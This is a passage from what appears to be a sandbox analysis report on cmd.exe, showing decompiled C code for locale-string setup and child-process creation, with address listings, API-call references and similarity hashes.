								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0x11ff668, 0x20) == 0) {
							_t100 = 0x11ff668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0x11ff668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0x11ff628, 0x20) == 0) {
							_t101 = 0x11ff628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0x11ff628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0x11ff7fc, 8) == 0) {
							_t102 = 0x11ff7fc;
							_t116 = 8;
							_t134 = "." - 0x11ff7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0x11ff7e8, 8) == 0) {
							_t103 = 0x11ff7e8;
							_t116 = 8;
							_t136 = "," - 0x11ff7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E011E6FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0x11fd0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

























































                                    0x011e3f8b
                                    0x011e3f92
                                    0x011e3fa3
                                    0x011e3fb0
                                    0x011ee1fa
                                    0x011ee204
                                    0x011ee209
                                    0x011ee20b
                                    0x011ee20b
                                    0x011ee213
                                    0x00000000
                                    0x00000000
                                    0x011ee215
                                    0x011ee21c
                                    0x00000000
                                    0x00000000
                                    0x011ee21e
                                    0x011ee221
                                    0x011ee224
                                    0x011ee227
                                    0x00000000
                                    0x00000000
                                    0x011ee22f
                                    0x011ee22f
                                    0x011ee232
                                    0x011ee234
                                    0x00000000
                                    0x011ee234
                                    0x011ee22d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee22d
                                    0x011e3fb6
                                    0x011e3fcd
                                    0x011e4011
                                    0x011e401c
                                    0x011e4032
                                    0x011e403b
                                    0x011e403e
                                    0x011ee23c
                                    0x011ee23f
                                    0x011ee263
                                    0x011ee26d
                                    0x011ee241
                                    0x011ee244
                                    0x011ee24a
                                    0x011ee254
                                    0x011ee254
                                    0x011ee244
                                    0x011e4044
                                    0x011e4044
                                    0x011e4049
                                    0x011e4049
                                    0x011e403e
                                    0x011e405e
                                    0x011e4074
                                    0x011e4080
                                    0x011e4080
                                    0x011e409c
                                    0x011ee27c
                                    0x011ee286
                                    0x011ee28b
                                    0x011ee28d
                                    0x011ee28d
                                    0x011ee295
                                    0x00000000
                                    0x00000000
                                    0x011ee297
                                    0x011ee29e
                                    0x00000000
                                    0x00000000
                                    0x011ee2a0
                                    0x011ee2a3
                                    0x011ee2a6
                                    0x011ee2a9
                                    0x00000000
                                    0x00000000
                                    0x011ee2b1
                                    0x011ee2b1
                                    0x011ee2b4
                                    0x011ee2b6
                                    0x00000000
                                    0x011ee2b6
                                    0x011ee2af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e40a2
                                    0x011e40a2
                                    0x011e40b4
                                    0x011ee2be
                                    0x011ee2c8
                                    0x011ee2cd
                                    0x011ee2cf
                                    0x011ee2cf
                                    0x011ee2d7
                                    0x00000000
                                    0x00000000
                                    0x011ee2d9
                                    0x011ee2e0
                                    0x00000000
                                    0x00000000
                                    0x011ee2e2
                                    0x011ee2e5
                                    0x011ee2e8
                                    0x011ee2eb
                                    0x00000000
                                    0x00000000
                                    0x011ee2f3
                                    0x011ee2f3
                                    0x011ee2f6
                                    0x011ee2f8
                                    0x00000000
                                    0x011ee2f8
                                    0x011ee2f1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee2f1
                                    0x011e40ba
                                    0x011e40cc
                                    0x011ee300
                                    0x011ee30a
                                    0x011ee30f
                                    0x011ee311
                                    0x011ee311
                                    0x011ee319
                                    0x00000000
                                    0x00000000
                                    0x011ee31b
                                    0x011ee322
                                    0x00000000
                                    0x00000000
                                    0x011ee324
                                    0x011ee327
                                    0x011ee32a
                                    0x011ee32d
                                    0x00000000
                                    0x00000000
                                    0x011ee335
                                    0x011ee335
                                    0x011ee338
                                    0x011ee33a
                                    0x00000000
                                    0x011ee33a
                                    0x011ee333
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee333
                                    0x011e40d2
                                    0x011e40e4
                                    0x011ee342
                                    0x011ee34c
                                    0x011ee351
                                    0x011ee353
                                    0x011ee353
                                    0x011ee35b
                                    0x00000000
                                    0x00000000
                                    0x011ee35d
                                    0x011ee364
                                    0x00000000
                                    0x00000000
                                    0x011ee366
                                    0x011ee369
                                    0x011ee36c
                                    0x011ee36f
                                    0x00000000
                                    0x00000000
                                    0x011ee377
                                    0x011ee377
                                    0x011ee37a
                                    0x011ee37c
                                    0x00000000
                                    0x011ee37c
                                    0x011ee375
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee375
                                    0x011e40ea
                                    0x011e40fc
                                    0x011ee384
                                    0x011ee38e
                                    0x011ee393
                                    0x011ee395
                                    0x011ee395
                                    0x011ee39d
                                    0x00000000
                                    0x00000000
                                    0x011ee39f
                                    0x011ee3a6
                                    0x00000000
                                    0x00000000
                                    0x011ee3a8
                                    0x011ee3ab
                                    0x011ee3ae
                                    0x011ee3b1
                                    0x00000000
                                    0x00000000
                                    0x011ee3b9
                                    0x011ee3b9
                                    0x011ee3bc
                                    0x011ee3be
                                    0x00000000
                                    0x011ee3be
                                    0x011ee3b7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee3b7
                                    0x011e4102
                                    0x011e4114
                                    0x011ee3c6
                                    0x011ee3d0
                                    0x011ee3d5
                                    0x011ee3d7
                                    0x011ee3d7
                                    0x011ee3df
                                    0x00000000
                                    0x00000000
                                    0x011ee3e1
                                    0x011ee3e8
                                    0x00000000
                                    0x00000000
                                    0x011ee3ea
                                    0x011ee3ed
                                    0x011ee3f0
                                    0x011ee3f3
                                    0x00000000
                                    0x00000000
                                    0x011ee3fb
                                    0x011ee3fb
                                    0x011ee3fe
                                    0x011ee400
                                    0x00000000
                                    0x011ee400
                                    0x011ee3f9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee3f9
                                    0x011e411a
                                    0x011e412c
                                    0x011ee408
                                    0x011ee412
                                    0x011ee417
                                    0x011ee419
                                    0x011ee419
                                    0x011ee421
                                    0x00000000
                                    0x00000000
                                    0x011ee423
                                    0x011ee42a
                                    0x00000000
                                    0x00000000
                                    0x011ee42c
                                    0x011ee42f
                                    0x011ee432
                                    0x011ee435
                                    0x00000000
                                    0x00000000
                                    0x011ee43d
                                    0x011ee43d
                                    0x011ee440
                                    0x011ee442
                                    0x00000000
                                    0x011ee442
                                    0x011ee43b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee43b
                                    0x011e4132
                                    0x011e4144
                                    0x011ee44a
                                    0x011ee454
                                    0x011ee459
                                    0x011ee45b
                                    0x011ee45b
                                    0x011ee463
                                    0x00000000
                                    0x00000000
                                    0x011ee465
                                    0x011ee46c
                                    0x00000000
                                    0x00000000
                                    0x011ee46e
                                    0x011ee471
                                    0x011ee474
                                    0x011ee477
                                    0x00000000
                                    0x00000000
                                    0x011ee47f
                                    0x011ee47f
                                    0x011ee482
                                    0x011ee484
                                    0x00000000
                                    0x011ee484
                                    0x011ee47d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee47d
                                    0x011e414a
                                    0x011e415c
                                    0x011ee48c
                                    0x011ee496
                                    0x011ee49b
                                    0x011ee49d
                                    0x011ee49d
                                    0x011ee4a5
                                    0x00000000
                                    0x00000000
                                    0x011ee4a7
                                    0x011ee4ae
                                    0x00000000
                                    0x00000000
                                    0x011ee4b0
                                    0x011ee4b3
                                    0x011ee4b6
                                    0x011ee4b9
                                    0x00000000
                                    0x00000000
                                    0x011ee4c1
                                    0x011ee4c1
                                    0x011ee4c4
                                    0x011ee4c6
                                    0x00000000
                                    0x011ee4c6
                                    0x011ee4bf
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee4bf
                                    0x011e4162
                                    0x011e4174
                                    0x011ee4ce
                                    0x011ee4d8
                                    0x011ee4dd
                                    0x011ee4df
                                    0x011ee4df
                                    0x011ee4e7
                                    0x00000000
                                    0x00000000
                                    0x011ee4e9
                                    0x011ee4f0
                                    0x00000000
                                    0x00000000
                                    0x011ee4f2
                                    0x011ee4f5
                                    0x011ee4f8
                                    0x011ee4fb
                                    0x00000000
                                    0x00000000
                                    0x011ee503
                                    0x011ee503
                                    0x011ee506
                                    0x011ee508
                                    0x00000000
                                    0x011ee508
                                    0x011ee501
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee501
                                    0x011e417a
                                    0x011e4181
                                    0x011e4199
                                    0x011e4199
                                    0x011e3fcf
                                    0x011e3fcf
                                    0x011e3fd4
                                    0x011e3fe0
                                    0x011e3fe0
                                    0x011e3fe6
                                    0x00000000
                                    0x00000000
                                    0x011e3fef
                                    0x011e400a
                                    0x011e400a
                                    0x011e400c
                                    0x011e400c
                                    0x00000000
                                    0x011e400c
                                    0x011e3ff1
                                    0x011e3ff5
                                    0x011e3ff9
                                    0x00000000
                                    0x00000000
                                    0x011e3fff
                                    0x011e4002
                                    0x011e4008
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e4008
                                    0x011e419a
                                    0x011e419c
                                    0x00000000
                                    0x011e419c

                                    APIs
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,011FF81C,00000008,00000000,?), ref: 011E3FA8
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 011E3FC5
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 011E402A
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 011E406C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,011FF80C,00000008), ref: 011E4094
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,011FF7A8,00000020), ref: 011E40AC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,011FF768,00000020), ref: 011E40C4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,011FF728,00000020), ref: 011E40DC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,011FF6E8,00000020), ref: 011E40F4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,011FF6A8,00000020), ref: 011E410C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,011FF668,00000020), ref: 011E4124
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,011FF628,00000020), ref: 011E413C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,011FF7FC,00000008), ref: 011E4154
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,011FF7E8,00000008), ref: 011E416C
                                    • setlocale.MSVCRT ref: 011E4181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: InfoLocale$DefaultUsersetlocale
                                    • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                    • API String ID: 1351325837-478706884
                                    • Opcode ID: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction ID: 01d5c50c34bf41494f6a64a8ceedfd0b5577f7e0b08e51f19e1b576177d46185
                                    • Opcode Fuzzy Hash: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction Fuzzy Hash: 39D12675702A029AEB3D8EB8890C7763AE5FF51644F14822DE612DA5C8EBB0C646C356
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322threadprocessstringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E011E374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E011E75CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x11fbdf8, 0x108);
				if(_t68 == 0) {
					 *0x1213cf0 = GetLastError();
					E011F5011(_t135);
					L21:
					return E011E7614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0x1213cf0 = GetLastError();
					E011F5011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E011E3320(L"COPYCMD") == 0) {
					}
					_t90 = E011DDF40(0x11d24ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x11fd0b4);
						L011E82BB();
						L36:
						goto L21;
					}
					if( *0x1213ccc == 0) {
						__eflags =  *0x1218058;
						if( *0x1218058 != 0) {
							goto L6;
						}
						__eflags =  *0x1213cc4;
						if( *0x1213cc4 == 0) {
							L8:
							E011E4C00();
							_t94 =  *0x1213cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0x1213cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0x1213ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0x1213cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E011E3A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0x1213cc9;
									if( *0x1213cc9 == 0) {
										L48:
										__eflags =  *0x1213cf0 - 0x2e4;
										if( *0x1213cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E011E00B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E011E1040(_t177, 0x7fe7, _t135);
												E011F5011(_t177);
												E011E0040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E011E7797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
											_t163 =  *0x1213cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0x1213ab0;
											}
											_t174 =  *0x121c01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x1213cf0);
										}
										goto L54;
									}
									__eflags =  *0x1213cf0 - 0xc1;
									if( *0x1213cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0x1203838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0x11fd54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E011E3A30();
											goto L21;
										}
										_t109 = E011E4C3E();
										 *0x120b8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E011E274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E011E3A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E011E274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E011E3A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E011F579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0x11d24f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0x1213ccc == 0) {
										__eflags =  *0x1213cc4;
										if( *0x1213cc4 != 0) {
											goto L16;
										}
										__eflags =  *0x1213cc9;
										if( *0x1213cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0x1218058;
											if( *0x1218058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E011F52E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0x1213cb8;
							if(_t95 == 0) {
								_t95 = 0x1213ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E011E2349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E011F4478();
					}
					goto L8;
				}
			}




























                                    0x011e3758
                                    0x011e375d
                                    0x011e3763
                                    0x011e3769
                                    0x011e376c
                                    0x011e376f
                                    0x011e3771
                                    0x011e3777
                                    0x011e377d
                                    0x011e3783
                                    0x011e3799
                                    0x011e37a0
                                    0x011e37a8
                                    0x011eddec
                                    0x011eddf3
                                    0x011e39e2
                                    0x011e39e7
                                    0x011e39e7
                                    0x011e37b1
                                    0x011e37c8
                                    0x011e37cf
                                    0x011e37d7
                                    0x011ede08
                                    0x011ede0f
                                    0x011ede1b
                                    0x00000000
                                    0x011e37dd
                                    0x011e37e7
                                    0x011e37f5
                                    0x011e37fb
                                    0x011e3808
                                    0x011e380e
                                    0x011e3817
                                    0x011e381f
                                    0x011e3820
                                    0x011e3826
                                    0x011e382c
                                    0x011e3832
                                    0x011e3840
                                    0x011e3848
                                    0x011e3853
                                    0x011e385c
                                    0x011e3862
                                    0x011e3871
                                    0x011e3873
                                    0x011e387a
                                    0x011e387f
                                    0x011e3887
                                    0x011ede3e
                                    0x011ede3e
                                    0x011ede43
                                    0x011ede44
                                    0x011ede49
                                    0x011ede51
                                    0x00000000
                                    0x011ede53
                                    0x011e3894
                                    0x011ede59
                                    0x011ede60
                                    0x00000000
                                    0x00000000
                                    0x011ede66
                                    0x011ede6d
                                    0x011e38bc
                                    0x011e38bc
                                    0x011e38c1
                                    0x011e38c8
                                    0x011e39ea
                                    0x011e39ed
                                    0x011e39ef
                                    0x00000000
                                    0x00000000
                                    0x011ede82
                                    0x011ede87
                                    0x011ede89
                                    0x011ede8b
                                    0x011ede8b
                                    0x011edeae
                                    0x011e38fe
                                    0x011e38fe
                                    0x011e3902
                                    0x011edec3
                                    0x011edec9
                                    0x011edecf
                                    0x011e3908
                                    0x011e390e
                                    0x011e391a
                                    0x011e391a
                                    0x011e3926
                                    0x011e392b
                                    0x011e3932
                                    0x011eded9
                                    0x011edee0
                                    0x011edeee
                                    0x011edeee
                                    0x011edef8
                                    0x011edf3e
                                    0x011edf3e
                                    0x011edf40
                                    0x00000000
                                    0x00000000
                                    0x011edf50
                                    0x011edf52
                                    0x011edf54
                                    0x011ede2b
                                    0x011ede32
                                    0x011ede39
                                    0x011ede39
                                    0x00000000
                                    0x011edf54
                                    0x011edefa
                                    0x011edefa
                                    0x011edeff
                                    0x011edf01
                                    0x011edf3c
                                    0x011edf03
                                    0x011edf03
                                    0x011edf09
                                    0x011edf0b
                                    0x011edf0d
                                    0x011edf0d
                                    0x011edf38
                                    0x011edf38
                                    0x00000000
                                    0x011edf01
                                    0x011edee2
                                    0x011edeec
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e3938
                                    0x011e3938
                                    0x011e3938
                                    0x011e3943
                                    0x011e3949
                                    0x011e394a
                                    0x011e394e
                                    0x011edf98
                                    0x011edf9a
                                    0x011e3967
                                    0x011e3967
                                    0x011e3970
                                    0x011e3977
                                    0x011e3a0c
                                    0x011e3a0c
                                    0x011e3a0f
                                    0x011edfbc
                                    0x011edfc2
                                    0x011edfc4
                                    0x011edfcb
                                    0x011edfd1
                                    0x011edfd1
                                    0x011e3a15
                                    0x011e3a15
                                    0x011e3a17
                                    0x011e3a1f
                                    0x011e3a1f
                                    0x011e3a17
                                    0x011e39d4
                                    0x011e39d4
                                    0x011e39db
                                    0x00000000
                                    0x011e39e0
                                    0x011e3983
                                    0x011e3988
                                    0x011e398d
                                    0x011e3993
                                    0x011e3995
                                    0x011e39a7
                                    0x011e39b7
                                    0x011e39bf
                                    0x011e3a26
                                    0x011e3a29
                                    0x00000000
                                    0x00000000
                                    0x011edfac
                                    0x011edfb4
                                    0x011e39c6
                                    0x011e39cb
                                    0x011e39d2
                                    0x011e3a49
                                    0x011e3a49
                                    0x00000000
                                    0x011e39d2
                                    0x011e39c1
                                    0x011e39c1
                                    0x00000000
                                    0x011e39c1
                                    0x011e3954
                                    0x011e3961
                                    0x011e39fa
                                    0x011e3a01
                                    0x00000000
                                    0x00000000
                                    0x011edf5f
                                    0x011edf66
                                    0x00000000
                                    0x011edf6c
                                    0x011edf6c
                                    0x011edf73
                                    0x00000000
                                    0x00000000
                                    0x011edf79
                                    0x011edf7b
                                    0x00000000
                                    0x00000000
                                    0x011edf81
                                    0x011edf83
                                    0x00000000
                                    0x00000000
                                    0x011edf87
                                    0x011edf8e
                                    0x011edf8f
                                    0x011edf92
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011edf92
                                    0x00000000
                                    0x011edf66
                                    0x00000000
                                    0x011e3961
                                    0x011e3932
                                    0x011e38ce
                                    0x011e38ce
                                    0x011e38d5
                                    0x011edeb9
                                    0x011edeb9
                                    0x011e38f8
                                    0x00000000
                                    0x011e38f8
                                    0x011ede73
                                    0x011e389a
                                    0x011e389c
                                    0x011e389f
                                    0x011e38a6
                                    0x011ede78
                                    0x011ede78
                                    0x00000000
                                    0x011e38a6

                                    APIs
                                    • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,011FBDF8,00000108,011DC897,?,00000000,00000000,00000000), ref: 011E37A0
                                    • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 011E37CF
                                    • memset.MSVCRT ref: 011E37E7
                                    • memset.MSVCRT ref: 011E3840
                                    • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 011E3853
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 011E38AE
                                    • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011E38F8
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011E391A
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDDE6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDE02
